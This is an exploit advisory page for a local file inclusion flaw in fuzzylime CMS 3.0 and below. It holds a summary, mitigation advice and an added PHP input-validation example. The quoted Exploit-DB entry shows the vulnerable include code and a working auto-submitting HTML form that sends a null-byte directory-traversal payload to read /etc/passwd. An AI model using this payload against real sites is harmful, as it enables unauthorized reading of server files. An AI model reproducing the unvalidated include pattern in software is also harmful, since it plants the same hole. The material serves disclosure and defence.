vendor: fuzzylime (cms)
by: wHITe_ShEEp
CVSS: 7.5 (HIGH)
CWE: Local File Inclusion
Product Name: fuzzylime (cms)
Affected Version From: Version <= 3.0
Affected Version To: Version <= 3.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

fuzzylime (cms) <= 3.0 Local File Inclusion

This exploit targets fuzzylime (cms) version 3.0 and below. The 'getgalldata.php' script places the POST parameter 'p' directly into an include path, so an attacker can include local files by manipulating that parameter. The vulnerability can be exploited when the 'magic_quotes_gpc' setting is turned off: the exploit ends the 'p' value with a '%00' null byte to cut off the '.inc.php' suffix the script appends, and magic_quotes_gpc would escape that byte. The exploit sends a POST request to the target site with a directory-traversal path to '/etc/passwd' in the 'p' value, which lets the attacker read sensitive system files.

Mitigation:

To mitigate this vulnerability, update to a newer version of fuzzylime (cms) that includes a patch for this issue. Enabling 'magic_quotes_gpc' can provide some protection against this type of attack, since the exploit works only with it off, but it does not validate the 'p' parameter.
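
One way to close the hole in code is to validate 'p' before it reaches the include in getgalldata.php. The following is an added example, not fuzzylime's code or the advisory author's; resolve_gallery_include() and the temporary gallery directory are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not fuzzylime code. resolve_gallery_include() and the
// temporary gallery directory below are hypothetical names for illustration.

/**
 * Map the user-supplied gallery name to a file inside $galleryDir.
 * Returns null if the name is not a plain identifier or the resolved
 * path leaves the directory.
 */
function resolve_gallery_include(string $galleryDir, $p): ?string
{
    // Allowlist: letters, digits, underscore, hyphen. This rejects "/", "."
    // and NUL bytes, so neither traversal nor suffix truncation gets through.
    if (!is_string($p) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $p)) {
        return null;
    }
    $base = realpath($galleryDir);
    $file = realpath($galleryDir . '/' . $p . '.inc.php');
    // Defence in depth: the canonical path must stay under the gallery
    // directory (catches symlinks that point elsewhere).
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed fixture: a throwaway gallery with one legitimate entry.
$gallery = sys_get_temp_dir() . '/gallery_demo_' . getmypid();
@mkdir($gallery);
file_put_contents($gallery . '/holiday.inc.php', "<?php // gallery data\n");

// Constructed inputs: one valid name, then the shapes sent in 'p'.
$samples = ['holiday', "../../../../etc/passwd\0", '../settings', ['x'], ''];
foreach ($samples as $p) {
    $path = resolve_gallery_include($gallery, $p);
    printf("%-36s => %s\n", json_encode($p),
        $path === null ? 'rejected' : 'include ' . basename($path));
}

unlink($gallery . '/holiday.inc.php');
rmdir($gallery);
```

In the script itself, the caller would answer with an error when the function returns null and pass only the returned path to include.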

Exploit-DB raw data:

#########################################################################################
#
#                           not sec group
#        http://www.notsec.com     info@notsec.com
#
#
#                      [fuzzylime (cms) <= 3.0]
#
# Class:         Local File Inclusion
# Found:       08/09/2007
# Site:           http://cms.fuzzylime.co.uk/
#Download:  http://cms.fuzzylime.co.uk/files/cms.zip
#Author:      [wHITe_ShEEp] of notsec
#Contact:     white_sheep@notsec.com - http://www.notsec.com
#
#########################################################################################


                   vulnerable code:
       [cms]/code/getgalldata.php
______________________________________________________

<?
$p = $_POST[p];                    // taken from the request body without validation
$m = $_POST[img];
$m = "e$m";
$entrytype = "gallery";
include "../gallery/$p.inc.php";   // user-controlled value becomes part of the include path
include "settings.inc.php";
include "../$admindir/languages/english.inc.php";
...
?>
_______________________________________________________



       Exploit: ( Works only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../etc/passwd%00" />
</form>
</body>
</html>
________________________________________________________




       Thanks to:
________________________________________________________

All notsec.com members;
r00t for testing;
________________________________________________________

# milw0rm.com [2007-09-08]